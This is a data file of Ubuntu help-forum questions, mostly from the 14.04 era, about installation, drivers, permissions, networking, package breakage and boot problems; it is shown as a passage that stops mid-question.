511036	sshd and openssh server installation	i 'm new to ubuntu . while installing hadoop i get port 22 : conection refused . then i found out that sshd and openssh server are missing . how to manually install these two ? can i get a step wise answer ?
511037	windows needs permission from unix user\root to delete/move in a samba share	so my samba share requires permissions from unix user\root to move or delete files . i do n't understand why . you do n't need to login to access the samba share . just need to be on the network . the share is mounted at /media/network on the server computer . here 's the error i get when i try deleting/moving a file : smb.conf : [ network ] path = /media/network writeable = yes ; browseable = yes force user = cody guest ok = yes permissions : ( ls -la /media/network ) ( the red covered things are user folders i created )
511038	how to replace libav with ffmpeg on pcduino borad ( arm ) ?	hi i am currently working with a pcduino board . i was trying to run ffmpeg but realized that i had install avserver instead . so i looked at this link how to replace avconv with ( the real ) ffmpeg and have it work right ? . now i am trying to follow the steps but on step three i get following error traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 185 , in < module > sp = softwareproperties ( options=options ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 97 , in __init__ self.reload_sourceslist ( ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 585 , in reload_sourceslist self.distro.get_sources ( self.sourceslist ) file `` /usr/lib/python2.7/dist-packages/aptsources/distro.py '' , line 87 , in get_sources raise nodistrotemplateexception ( `` error : could not find a `` aptsources.distro.nodistrotemplateexception : error : could not find a distribution template i tried to ignore step 3 but then after step sudo apt-get install ffmpeg i end up installing the fake ffmpeg again . can anyone please help me how to get the real ffmpeg on lubuntu . i have now spent 5 days going round and round on this one . edit : after running cat /etc/lsb-release distrib_id=linaro distrib_release=12.07 distrib_codename=precise distrib_description= '' linaro 12.07 ''
511046	if i backup my ubuntu ( unity ) using deja , can i restore it when i use a fresh install of ubuntugnome ?	this may be a weird question , but it has me stumped and google is little help . i am currently running ubuntu with the default unity interface . i 've been wanting to experiment with different de 's for a while now and have finally been convinced to just use ubuntugnome instead of juggling unity and gnome as this has caused issues in the past . my question is , if i 'm backing up my system now using the default backup app deja dup ( on unity ) , can i restore it once i have ubuntugnome ( simply so i can get my personal files back from my home folder- music , pics , etc . ) or do i have to back those files up independently of the backup files because of compatibility issues ? thanks in advance !
511047	unable to play dvd 's in ubuntu 14.04	this appears to be quite a common problem , but i can not get dvd 's to play on trusty tahr . i have vlc , and per the online forums i installed the following libdvdread4 libdvdcss ubuntu restricted packages i also installed regionset and that did n't work either as it wo n't recognize that there is a disc in the drive , although vlc can see ( just not play it ) other video seems to be fine , as i can stream and even download and play
511050	how to grant apache2 access for php script to modify /media/user/ [ sd card on phone ] ?	my achievement is that the script can access /media/user folder , but for some reason it can not sneak into the mounted sd card located on the phone . of course this can be accessed from nautilus . i want my php script to check the files ( scandir ( ) ) and do update stuff depending on external servers . shortcut to the sd card at /var/www did n't grant access . sudo chown gets operation not allowed error . sudo chmod o+rwx /media/user/sdcard did n't make a difference . is the sd card protected by a special method or something ? also while using nautilus as the root i can not modify any file or folder permissions because i get crashes on open properties window ( nautilus hangs and quits ) since ~1 month ago when i 've tried to change some permissions .
511052	black screen + no install	i tried to install ubuntu ... but when i booted the disc the computer said it was n't bootable , it said please insert bootable media . how can i fix this ?
511053	has ubuntu some firewall activated by default ?	because i ca n't seem to connect to my ip-cam . and mnap produces alternating results if i use the cams ip address : nmap scan report for 192.0.0.64 host is up ( 0.00079s latency ) . not shown : 991 closed ports port state service 21/tcp filtered ftp 23/tcp filtered telnet 80/tcp open http 443/tcp open https 554/tcp open rtsp 7001/tcp open afs3-callback 8000/tcp open http-alt 8200/tcp open trivnet1 49152/tcp open unknown nmap scan report for 192.0.0.64 host is up ( 0.79s latency ) . not shown : 998 closed ports port state service 21/tcp filtered ftp 23/tcp filtered telnet starting nmap 6.40 ( http : //nmap.org ) at 2014-08-14 01:21 cest nmap scan report for 192.0.0.64 host is up ( 0.0011s latency ) . not shown : 991 closed ports port state service 21/tcp filtered ftp 23/tcp filtered telnet 625/tcp filtered apple-xsrvr-admin 2383/tcp filtered ms-olap4 6699/tcp filtered napster 7001/tcp open afs3-callback 13722/tcp filtered netbackup 32769/tcp filtered filenet-rpc 49155/tcp filtered unknown here 's an arp-scan 192.0.0.102 is my tv-box . motorola my router : nuc @ nuc : ~ $ sudo arp-scan -- localnet [ sudo ] password for nuc : interface : eth0 , datalink type : en10mb ( ethernet ) starting arp-scan 1.8.1 with 256 hosts ( http : //www.nta-monitor.com/tools/arp-scan/ ) 192.0.0.1 00:22:10:82:61:40 motorola mobility , inc. 192.0.0.64 44:19 : b6:2d:13 : a8 ( unknown ) 192.0.0.102 00:80:3f:3a : d6:79 tatung company 3 packets received by filter , 0 packets dropped by kernel ending arp-scan 1.8.1 : 256 hosts scanned in 1.428 seconds ( 179.27 hosts/sec ) . 3 responded the dhcp-range of my router is .101 to .199 . my pc ( nuc ) is set to do dhcp under ip v4 router :
511056	updating to 14.04.1 lts broke netatalk mounts	this morning i updated my ubuntu server installation from 14.04 to 14.04.1 , using do-release-upgrade . before the update , i was able to mount the shares on this server from my mac , as well as use a share for backups . after the upgrade , connecting to the share causes the following to be displayed in syslog : afpd [ 5695 ] : =============================================================== afpd [ 5695 ] : internal error : signal 11 in pid 5695 ( 2.2.2 ) afpd [ 5695 ] : =============================================================== afpd [ 5695 ] : backtrace : 3 stack frames : afpd [ 5695 ] : # 0 /usr/sbin/afpd ( netatalk_panic+0x1f ) [ 0x7f1e96ac48bf ] afpd [ 5695 ] : # 1 /usr/sbin/afpd ( +0x549bc ) [ 0x7f1e96ac49bc ] afpd [ 5695 ] : # 2 /lib/x86_64-linux-gnu/libc.so.6 ( +0x37000 ) [ 0x7f1e953ef000 ] my macs syslog ( os x 10.9.4 ) displays the following : kernel [ 0 ] : asp_tcp checkreqqueuesize : increasing req queue from 32 to 128 entries . so 0xffffff80318ea3b8 kernel [ 0 ] : asp_tcp cancelonerequest : cancelling slot 2 error 89 reqid 4 flags 0x9 afpcmd 0x13 so 0xffffff80318ea3b8 netauthsysagent [ 13902 ] : afp_sendmsg : sendmsg failed 0xffffffff errno = 89 netauthsysagent [ 13902 ] : afp_sendmsg : sendmsg failed 0xffffffff errno = 32 netauthsysagent [ 13902 ] : error : afp_opensession - login failed with 89 the kernel [ 0 ] errors are also thrown when backupd attempts to mount the share for a scheduled backup , so they appear to be related , though i ca n't fathom what they mean . any ideas ? i 've completely erased netatalk with apt-get remove -- purge netatalk and re-installed it , as well as rebooting the server multiple times , with the same errors displayed . also , smb shares still work fine , but obviously smb wo n't work for time machine backups .
511057	rhythmbox control buttons not displayed properly	after an upgrade to kubuntu 14.04 and to rhythmbox 3.02 the control buttons in the upper left corner ( play/stop , next/previous song , repeat , shuffle ) and other icons ( music library , libre.fm etc . ) are not displayed properly . instead it shows an icon like a document with a question mark . they work , but do n't look very nice . i tried reinstalling rhythmbox , but that did n't help . what could be wrong ? i 've tried the gnome-icon-theme package and it tells me the newest version is already installed . the same for the humanity-icon-theme .
511059	force format usb	maybe you can help me but i 'm becoming very doubtful . but i have a verbatim flash drive ( third verbatim flash drive to do this to be exact and one sandisk all the same problem over the past year ) but using them between windows machines and linux machines switching between the two they eventually be come corrupt and no amount of software can fix them that i have found and the more i try to format them whether on windows or linux they just keep getting more and more errors each time till i give up . any way i will just tell you my problems from the one that messed up last night . i reinstalled windows on a customers computer so i backed up the drivers to the the usb stick and transferred them to my ubuntu desktop and then used ubuntu to make the usb bootable to install windows and it went flawless . however i reformatted the drive and slid the drivers for windows back on it appeared to have worked only some of the files were n't making it to the usb drive tried like 10 times each time different files were missing even though ubuntu said it was successful . i formatted the drive multiple times during the process and eventually the flash drive started getting errors on both computers . windows kept saying it could n't read it and needed to format it and ubuntu kept getting all kinds of errors under gparted . anyway i 've tried dd , disk utility , gparted , fsck . at this point it is so bad it do n't matter what i try or what command i use it always comes back as read-only and it wont do anything to it . i do n't currently have access to a windows machine i have a windows 7 virtual machine but it crashes as soon as i plug in the drive .
511060	looking for text bbs software	i would like to know if there are text-based , bulleting board system forum servers for ubuntu . which can be used via telnet or ssh . i was searching for this kind of software and came to this bbs client : https : //apps.ubuntu.com/cat/applications/quantal/pcmanx-gtk2/ which has this screenshot i would like to know which software is that ( the server ) which look like a html forum but is text based . thank you
511062	pandora wo n't run in tor browser	i get an error message to update flash which i have , tried updating browser and no luck . any suggestions ? i 'm using tor instead of firefox or chrome as a way around a firewall both of which block pandora completely .
511063	rdp virtualbox ubuntu 12.04lts windows 7	there are many rdp questions out there , none of the ones i 've read up to now have the exact same problem . i have : a dedicated server running ubuntu 12.04lts an installation of virtualbox with two instances of windows 7 in order to rdp to the virtualised os 's i need to set the adapter to bridged , i have read that on so many tutorials & supprt sites etc . when i do this , according to tutorials , the ip address should be assigned within the same range as the server and then i can rdp to the vm ... .. this doesnt work for me . do i need to forward the server-ip : port to the vm-ip : port to be able to access rdp ? do i need to alter the /etc/network/interfaces ? or could it be due to dhcp ? update : i 've not configured anything on the ubuntu dedicated server as of yet , but i have tried all types of 'attached to ' adapters in virtualbox . i do n't know if this is relevant at all , but when i edit the vm only nat ( adapter type ) seems to have the ability to access internet . all other ( including bridged ) fail to connect to internet ( but can not be pinged from the ubuntu server ) . i have to be honest here , this is the first time i 've tried to set this up , and in all the guides and tutorials , when selecting 'bridged adapter ' , it should just work . this is a head scratcher for me ! update : it appears that rdp gets only as far as the ubuntu xrdp service . i stopped it now need to route the rdp traffic to the vm ( i think ) ... . to close : the server ip tables were not being updated by ufw , a 'fasthosts feature ' is that they use a different location for the firewall , once i had opened the ports and forwarded them the connection was allowed . also for anyone else in this perdicament , i hope this helps ! regards ; )
511064	speed up internet by multiple connections	i had made research about increasing internet speed by connection on multiple source . and i find out that ubuntu support it already . i had connect two phone ; iphone with cable and samsung with wifi . and my download speed was increased ( not downloading single file just when using internet for opening web pages etc . ) now i want to connect ; one or two 3g mobil modem , and one phone with cable , but when i connect 3g modem and phone i only can use one connection at the time and there is no any increase in speed . i had read about bonding , but i dont know would it solve my problem . i just need more bandwidth for surfing web not for download . thank you all for your help
511065	stuttering screens on 14.04 on macpro	a friend gave me an old macpro and installed 14.04 on it . having a problem with occasional stutters on the video - screen freezes for a second or two , then returns to normal . guessing it 's something to do with xorg , any suggestions how to troubleshoot ? running both amd and nvidia display cards using the xorg open source drivers : 02:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] juniper xt [ radeon hd 5770 ] [ 1002:68b8 ] ( prog-if 00 [ vga controller ] ) subsystem : apple inc. macpro5,1 [ mac pro 2.8ghz ddr3 ] [ 106b:00cf ] physical slot : 1 flags : bus master , fast devsel , latency 0 , irq 58 memory at 80000000 ( 64-bit , prefetchable ) [ size=512m ] memory at b3e00000 ( 64-bit , non-prefetchable ) [ size=128k ] i/o ports at 3000 [ size=256 ] expansion rom at b3e20000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : radeon 06:00.0 vga compatible controller [ 0300 ] : nvidia corporation gt218 [ geforce 210 ] [ 10de:0a65 ] ( rev a2 ) ( prog-if 00 [ vga controller ] ) subsystem : gigabyte technology co. , ltd device [ 1458:34d5 ] physical slot : 3 flags : bus master , fast devsel , latency 0 , irq 59 memory at b2000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at a0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at b0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at 2000 [ size=128 ] expansion rom at b3000000 [ disabled ] [ size=512k ] capabilities : < access denied > kernel driver in use : nouveau system : 9.8 gib ram intelâž xeon ( r ) cpu e5462 @ 2.80ghz ă 8 gallium 0.4 on amd juniper 64-bit cheers
511066	why hibernate does not work in 14.04 ?	i had hibernate working with encrypted home folder and encrypted swap in 12.04 with luks . then fresh install 14.04 and no longer works resume from hibernate , just suspend is working . the method used was this one . this is my pm-suspend.log . is there anything missing in 14.04 for hibernate to work properly ?
511067	unable to locate package compiz-fusion-plugins-extra	when i try to install compiz-fusion i get this messge `` unable to locate package compiz-fusion-plugins-extra '' . so i do n't know why is that and i do n't know how to fix it . if anyone can help me with this i really appreciate . thanx ... ... ..
511068	wacom tablet removed after sleep mode	the tablet functionality stops working after i wake my lenovo tablet from sleep mode ( closing & opening lit ) . the error message is `` tablet serial wacom tablet ( lenovo x201 ) removed '' ( screenshot : http : //dl.dropbox.com/u/2471034/mos-ash1.jpeg ) . in the system settings under input devices it states that `` no tablet device is detected '' . only a restart helps and the touch screen works again . this error appeared only after upgrading from kubuntu 12.04 to 14.04 . in 12.04 the same error message appeared after waking from sleep mode , but then another followed that the tablet was activated again and it worked properly . any ideas how this could be fixed ?
511070	how to uninstall ubuntu ?	i have windows 7 and ubuntu 14.04 installed in my pc as dual-boot system.but now i want to uninstall ubuntu and reinstall it later.how can i uninstall ubuntu keeping my personal data as same as before ?
511072	how to get into grub on presario cq43 hp laptop to change root password without cd drive ?	my laptop model : hp compaq presario cq43 . operating system : win7 dual boot : windows , ubuntu.. trying to get into grub menu by pressing shift key with hold immediately after powering on laptop . unable to get into grub . unable to work with second option to use ubuntu cd as installation done without cd . is there any other alternative to get into grub without reinstalling ubuntu to change root password ? shyamal
511073	only a few programs will launch without rebooting first	i 'm running 14.04 trusty tahr , and after a recent update my system has an issue ( i want to be clear that i mess with settings a lot , so this may not be directly the fault of the update , but the problem did n't occur before then , and i do n't recall making any other changes at the time ) . the problem is that after loading up , ubuntu will only open a few programs . after it has opened about 3-4 , or after it has been running for a while , other programs will refuse to launch ( even if all the current programs are closed . after closing they wo n't reopen . ) trying to launch them will sometimes result in a loading icon on the cursor , and other times , nothing . strangely , this does n't seem to affect synaptic package manager or nautilus , but does affect the terminal - which i have strong negative feelings about . it 's a pain because i ca n't check to see if opening them from terminal will work . i can switch programs by restarting my computer , but obviously this is n't an ideal solution . i should also mention i have a dual-boot , in case this has to do with memory . is this a known problem ? are other people experiencing it now ?
511075	ubuntu tweak compatible with 14.04 ?	i 'm running ubuntu 14.04 and can not update due to full root despite running autoremove and autoclean . i installed ubuntu tweak but clicking on the icon does nothing .
511076	libegl warning : dri2 : failed to authenticate	trying to run a game & the game opens the closes right away & in the terminal it says `` libegl warning : dri2 : failed to authenticate '' i have searched for weeks trying to fix the problem . all i found is ubuntu has a bug that has not been fixed yet ? nvidia drivers do not have dri2 support ? anyone know how to fix this , its driving me nuts . i have tried nouveau drivers and i get even more libegl warning errors i am running ubuntu 14.04
511080	vaio sve17122cxb keyboard backlit not working - ubuntu 14.04 lts	the keyboard backlit for my vaio sve17122cxb is not working . is there a solution ? i 'm running ubuntu 14.04 .
511081	printer configuration failures and upgrade failures	this has become more and more of a problem . i was using 4.8 kubuntu and could not configure remote printers under system setting printer configuration . i updated to 4.134 . i then downloaded print manager since that was supposed to be the new way to configure printers . i could not find any way to actually run print manager so i tried overwriting my /bin files in root . ( do n't ever do that ) . i repaired my damaged /bin directory with sudo fdisk -l sudo mount /dev/sda1 /media cd /media cd /bin sudo rm sh sudo ln -s bash sh sudo apt-get update sudo apt-get install -- reinstall dash after that , i did not have a desktop , which i got back through the following : cat ~/.kde/env/desktop_effects export kwin_direct_gl=1 echo $ kwin_compose kwin_direct_gl=1 kwin_compose=o2 kwin -- replace & after that , i got a notice to upgrade to 4.14 which now does not work because of a failure to purge ppas . i am still in 4.13 . then , still getting printer config on my system settings , i deleted printer-config in synaptic and reinstalled print manager . still do not have the ability to configure printers and can not find and run print manager . printers yields a configuration file error and can not run printers in system settings . the config printer icon is no longer showing . reinstalled printer configuration which still does not have config printer icon and printers gives same print configuration file error . i should be able to nuke and reinstall everything somehow and after the dust settles , be able to configure a printer . cups can not find remote printers either . do you have any suggestions ? and i promise not to ever , ever , ever overwrite my /bin again .
511083	ca n't add files to newly created encrypted partition ?	hey guys i just followed this guide and i am unable to add files to the mounted drive . when i click and drag the folder or file it slowly moves back to the desktop . i also click on properties on the encrypted partion and it says in the permissions tab that i am not the owner , so you can not change these permissions . any ideas whats going on here ?
511085	installing ubuntu across multiple hard drives	i am building a new pc and i want to only have ubuntu on it . it has two hard drives , one being a 180gb ssd drive and the other a 2tb hdd . i want to use this system mainly for work ( software developement for embedded systems , android and web development ) and also for entertinemet . my question is , what would be the ideal distributing of linux folders ege /home /etc /temp in this situation ? with the focus of getting the maximum out of the ssd drive so booting up and routine works be fast.please let me know what do you suggest
511086	hide and unhide folders permanently	in my local drive for a folder , when i add ' . ' followed by the folder name , and press ctrl+h , the folder gets invisible , but once if i close that drive and open it again the hidden files are automatically visible without pressing ctrl+h . so how to hide a folder permanently .
511088	how to print on both the sides of a page using libre office	i just want to know the procedure by which one can print a documents on both the sides of a paper using libre office .
511089	really slow video on 14.04 with a nvidia geforce4 420 go 32m	i have just installed ubuntu 14.04 in dual boot with windows xp . every thing works great on my hp tc1100 with intel pentium ( r ) m processor 1.20ghz , 2.0g ram , 32-bit . but the video is really slow . i went to nvidia 's website and found : nvidia-linux-x86-96.43.23-pkg1.run . but i do n't know how to install it , or even if i should install it . or should i run a different version of ubuntu ? i tried turtle bum 's answer three times . and it crashed the gui interface each time . i can bring up a command line , but any gui i try to run i just get a blank screen .
511091	juju deployment fails due to `` container failed to start '' error	i had tried to deploy mysql and i had this error : agent-state-info : container failed to start outputs from log as following : line 47 : machine-0 : 2014-08-14 02:02:30 info juju.state.api apiclient.go:250 error dialing `` wss : //localhost:17070/ '' : websocket.dial wss : //localhost:17070/ : dial tcp 127.0.0.1:17070 : connection refused line 48 : machine-0 : 2014-08-14 02:02:30 error juju.worker runner.go:218 exited `` api '' : unable to connect to `` wss : //localhost:17070/ '' error juju.container.lxc lxc.go:243 container failed to start : container failed to start line 438 : machine-0 : 2014-08-14 02:04:44 error juju.provisioner provisioner_task.go:421 can not start instance for machine `` 1 '' : container failed to start how do i resolved this issue ? any inputs are greatly appreciate .
511093	the package system is broken ... unmet dependencies	some will say this is duplicate but it is not : ) basically , i am running ubunto 14.04 lts and i removed libreoffice to install openoffice . then i was trying to re-install libre again ( so that i have both ) and i got some errors . at this point my software centre is stuck . i have a few libreoffice modules that show installed in the sc but they are not . i get this red bullet in the right top corner of the desktop screen : an error occurred , please run package manager from the right click menu or apt-get in a terminal to see what it is wrong . this error message was : 'error : brokencount > 0 ' . this usually means that your installed packages have unmet dependencies . if i right-click and then click on show updates it shows that an ubuntu base security update is available . if i try to install it says : the package system is broken . check if you are using third-party repositories . if so , disable them , because they are a common source of problems . furthermore , run the following command in a terminal : `apt-get install -f` if i run apt-get install -f i get : ... processing triggers for shared-mime-info ( 1.2-0ubuntu3 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... errors were encountered while processing : /var/cache/apt/archives/libreoffice-common_1 % 3a4.2.4-0ubuntu2_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) if i do sudo apt-get remove libreoffice* , i get : ... package 'libreoffice-subsequentcheckbase ' is not installed , so not removed package 'libreoffice-wiki-publisher ' is not installed , so not removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : mythes-en-us : depends : libreoffice-core but it is not going to be installed or openoffice.org-core ( > = 1.9 ) but it is not installable or language-support-writing-en but it is not installable python3-uno : depends : libreoffice-core ( = 1:4.2.4-0ubuntu2 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i removed third party dependencies from the sc , not good came out of it . if i do : sudo apt-get install libreoffice-core , i get : reading package lists ... done building dependency tree reading state information ... done libreoffice-core is already the newest version . libreoffice-core set to manually installed . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libreoffice-core : depends : libreoffice-common ( > 1:4.2.4 ) but it is not going to be installed libreoffice-help-en-us : depends : libreoffice-l10n-en-us libreoffice-l10n-en-gb : depends : libreoffice-common but it is not going to be installed libreoffice-l10n-en-za : depends : libreoffice-common but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i do : sudo apt-get purge libreoffice* , i get : package 'libreoffice-wiki-publisher ' is not installed , so not removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : mythes-en-us : depends : libreoffice-core but it is not going to be installed or openoffice.org-core ( > = 1.9 ) but it is not installable or language-support-writing-en but it is not installable python3-uno : depends : libreoffice-core ( = 1:4.2.4-0ubuntu2 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i do : sudo apt-get update , it is ok. sudo apt-get purge libreoffice* yelds : ... package 'libreoffice-l10n-gd ' is not installed , so not removed ( lots of similar ones ) you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : mythes-en-us : depends : libreoffice-core but it is not going to be installed or openoffice.org-core ( > = 1.9 ) but it is not installable or language-support-writing-en but it is not installable python3-uno : depends : libreoffice-core ( = 1:4.3.0-0ubuntu1~trusty1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i manually removed a bunch of libreoffice files , no use . i am not sure what else i can do . help please ? many thanks !
511095	zte mf667 not working in ubuntu 14.04	ubuntu 14.04 does n't support zte mf667 modem . i found that the reason can be , because of upgrading from 13.10 to 14.04 ubuntu . but i installed a fresh 14.04 version of the ubuntu . appreciate your help on this .
511098	kernel panic error message	got a crash message while restarting . get same message after reboot : kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) cpu 1 pid 1 comm : swapper/0 not tainted 3.13.0-34-generic # 60-ubuntu hardware name : gigabyte technology co , ltd , to be filled by oem /f2a88xm-hd3
511099	keyboard and mouse are not working on dell laptop after updrading to 14.04 lts version	need a help , system configuration : dell vostro , ram : 4gb , processor : i3 , hdd : 500gb , yesterday , i have upgraded my ubuntu os version 12 . ** lts into 14.04 lts on that time my external mouse and keyboard was working fine . it 's a connected via ps2 to usb connector on laptop . after upgrading these stopped working . i have connected another mouse via usb on same usb port and it 's working fine . plz help me to solve this problem ...
511101	how can i remap the keys/keycodes of a usb foot switch on systemd ?	i was using the old udev rules to remap my usb foot switch key ( the default is the keycode 36 -b : s ) to alt_l . previosly i created a udev rule and a xmodmap file . but i 'm trying the systemd now , and the old style keymaps are gone . my usb foot switch is the following ( lsusb output ) : 0c45:7403 microdia foot switch in my old udev files , i had the following content : /etc/udev/rules.d/95-keymap.rules '' env { id_vendor_id } == '' 0c45 '' , env { id_model_id } == '' 7403 '' , run+= '' keymap $ name microdia '' /lib/udev/keymaps/microdia 0x70005 f13 ~/.xmodmap keycode 191 = alt_l meta_l alt_l meta_l so , when i was pulling the switch the effect is that the key 'alt_l ' was pressed . how can i reproduce the same setup with the systemd/udev hwdb ? thanks in advance .
511102	how to apply wireshark patch	running wireshark version 1.10.6 ( v1.10.6 from master-1.10 ) on 14.04 lts . it crashes anytime i open a voip graph flow . got the patch at https : //bugs.wireshark.org/bugzilla/show_bug.cgi ? id=9179 ca n't figure out how to apply it . do n't know where or what file i should apply it to . please help
511103	what negative consequences can come from disabling access time logging ?	i 'm using ubuntu 14.04 and i have a ssd hardrive on my samsung series 9 . i 'm told to do stuff so that my ssd hardrive does n't die young : ) i have set my swappiness to 1 ( from the default 60 ) to avoid using my swap ( 4.5g since my ram is 4g ) unless absolutely necessary . i also found an advice that it was important to 'disable access time logging ' . using this command : sudo nano /etc/fstab what does this do and can something bad happen or what i 'm i loosing if i do it ? ( side question : when i use my computer for more than a couple of hours i have noticed that swap is used ; up to 2g one time . do i have to turn of my computer frequently to avoid this or can i do something else to avoid using my swap ? )
511104	how to create a live usb key for a suse distro on ubuntu ?	i use ubuntu on a daily basis and want to try suse on my second laptop . neither startup disk creator ( both versions on the ubuntu universe ) nor unetbootin allow me to use anything different than another ubuntu distro to create the live usb key . i do n't use windows anymore , so doing this on a pc is not an option . is there any other way / application ?
511105	laptop does n't suspend	my laptop is lenova t530 and i use ubuntu 13.10 . when i try to suspend the laptop ( either by selecting suspend from the menu or by closing the lid ) , it does n't suspend . it appears that it 's trying to suspend but in a moment it awakes . any suggestion to get this fixed is highly appreaciated
511106	problem when booting ubuntu - press s to skip mounting or m for manual recovery	when starting ubuntu i get an error message that says : an error occurred while mounting /windows . press s to skip mounting or m for manual recovery . searching the internet i saw that i should open the /etc/fstab file from the terminal , but when i open that file i do not know what to do . this is what appears in my /etc/fstab file : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda9 during installation uuid=eff4b2da-0926-4c1e-aadc-cc1f02f13983 / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda7 during installation uuid=86d9aa0b-d72c-4050-8841-5cced37d5c45 /boot ext4 defaults 0 2 # /boot/efi was on /dev/sda1 during installation uuid=a809-eae3 /boot/efi vfat defaults 0 1 # /home was on /dev/sda10 during installation uuid=85f4c1f1-53a0-4c78-83e7-badaca16bf65 /home ext4 defaults 0 2 # /windows was on /dev/sda5 during installation uuid=ee28d21928d1e09f /windows ntfs defaults , umask=007 , gid=46 0 0 # swap was on /dev/sda8 during installation uuid=02f941ad-edf0-4fe2-bf80-3536bbfd54af none swap sw 0 0 thanks in advance for your assistance .
511107	xubuntu usb-key vs. harddisk setup problem ( no network + wlan )	hi please help me on this weird problem : lan and wlan only works in live modus , not after hd-install . hardware is an old compaq nx7300 . lspci | grep -i net says : 02:0e.0 ethernet controller : broadcom corporation bcm4401-80 100basetx ( rev 02 ) 10:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) i have managed to configure an usb-stick to `` try out '' xubuntu 14.04 and it works , lan was recognized automatic , wlan is now working after i followed those steps : http : //ubuntuforums.org/showthread.php ? t=297092 & highlight=nx7300 ( until `` reboot '' ) however if i make a permanent hd install from this usb stick neither lan nor wlan is working , i have no internet at all . is there a way to somehow copy the config of the currently live usb-stick to the harddisk installation ?
511109	ubuntu 14.04 installed alongside with windows 8.1 but the system boot directly to windows once i logged into windows and restart	i was able to install ubuntu 14.04 in my windows 8.1 pre-installed pc . i was able to have the dual boot of the system . grub menu works fine , i.e . it shows both ubuntu and windows boot manager , and the corresponding os can be booted up properly . but , if i choose windows 8.1 to boot , and restart the pc after that , grub menu does not show up anymore and the pc boots directly to windows . i found , from my bios setup , the boot order shows windows boot manager is on the top although i changed ubuntu on the top before . i have to put ubuntu on the top again in order for grub menu to appear again . but , next time , if i go to windows , and restart the pc , the boot order is restored back to windows on the top and no grub menu shows up . how can i make the boot order in bios does not change ? i have already disabled the secure boot and fastboot , and make the system support legacy boot . but , it does not help . i guess the issue is on windows 8.1 somehow reorders the boot order ( put itself on top ) once i boot into windows 8.1 .
511116	14.04 upgrade stuck with blank screen	13.10 version was fully updated before attempting 14.04 upgrade ; all steps went thru ok. at 'restart ' ubuntu screen comes once and vanishes with just leaving a curser . then i get messages `` nouvou xorg failed to idle channel 0 '' etc repeats itself a few times . curser freezes . can get a terminal working . ls shows my data , home directory etc . workarounds suggested for similar problem by editing grub ( `` grub_cmdline_linux= `` quiet splash nomodeset acpi_osi= \ '' linux\ '' could not be tried as gksudo gedit /etc/default/grub fails to open grub in an editor , with a message saying display can not be opened . suggestions to fix that with xhost +si : localuser : < user > etc does not work . i am a novice linux user , and even finding out all these was difficult . i went back and re-installed 13.10 and had to reload my data and application settings just to prove to myself that my hardware is not broken ; with 13.10 it works ok . i waited for a few weeks , and tried to upgrade again , as this kind of problem had been reported by others , hoping a later version of the upgrade will be ok . the problem persists , with 14.04 installed as upgrade . i am frustrated that there is no solution ... discussion thread on 109718 is inconclusive acknowledging that there is a problem . it is not my hardware ( dell dimension 9200 ; xp 2007 vintage successfully ran 13.1 since jan 2014 ) . currently with 14.04 it fails . please help .
511119	low graphics mode after fiddling with amd driver	i 'm a user new to ubuntu . i 've installed ubuntu 14.04 and tried to install an amd driver . i was able to install it via amd 's website . maybe because i installed the wrong driver , after rebooting , i happened to get a `` low graphics mode '' sign and was never able to fix this problem . i am using a hp pavilion dm4 laptop which has a intel , amd hybrid graphics card . are there any tips to solve this issue ? thanks !
511123	my computer wont let me do sudo commands	i took off the password ( i thought it was annoying and i am the only one who uses my computer ) and now i cant do any sudo commands or put the password back on . help !
511124	ca n't login to ubuntu 12.04	i tried to upgrade from 12.04 to 14.04 but it was a partial upgrade because the computer shut down in between . then after the partial upgrade the system tray disappeared . then the system tray can not be detected message keeps coming up . i tried to repair the package files in recovery mode but that does not help and after ctrl + alt + f1 i ca n't even log in and i 'm sure that the user name and password i 'm typing are correct..
511125	does the magic sysrq key always work ?	my computer is running ubuntu from a live cd and is frozen to the point where i ca n't even turn num lock on and off . does the magic sysrq key work even now ? and is it something that 's enables by default or does it need to be enabled by the user ?
511129	fprint-demo casusing authentication failure	i installed fprint-demo in ubuntu 14.04 unfortunately i did not setup the finger prints and when i try to log in ; its denying my password . i tried to remove the password in recovery mode : rw -o remount / passwd -- delete username reboot but when the system reboots to log in without a password it says `` failed to authenticate ''
511130	ubuntu 14.04 : keybord issue ( some of the keys do n't work )	i have a problem with keybord while using ubuntu 14.04 . it happens that after blocking the computer , some of the keys are not working . there are always the same keys ( from what i noticed ) , like i , o , t , backspace ... so i 'm not able to login . sometimes after clicking 10000x on keys , i 'm able to input my password , but than working is extremely hard - you can imagine doing something without backspace . problem disappear after reboot . problem exists only after locking ( when i need to login again ) . computer is new . i have no idea it is a problem of hardware or ubuntu . can you please give me a hint ? i checked `` input method configuration '' : number of valid choices : 2 ( normally 1 ) the configuration set by im-config is activated by re-starting x . explicit selection is not required to enable the automatic configuration if the active one is default/auto/cjkv/missing . available input methods : ibus xim unless you really need them all , please make sure to install only one input method tool . could it be the issue ? update : i 've checked it with usb keybord - problem exist only in built-in keybord . so it happens that some of the keys do n't work on my laptop , but in the same time usb keyboard works fine . today it has 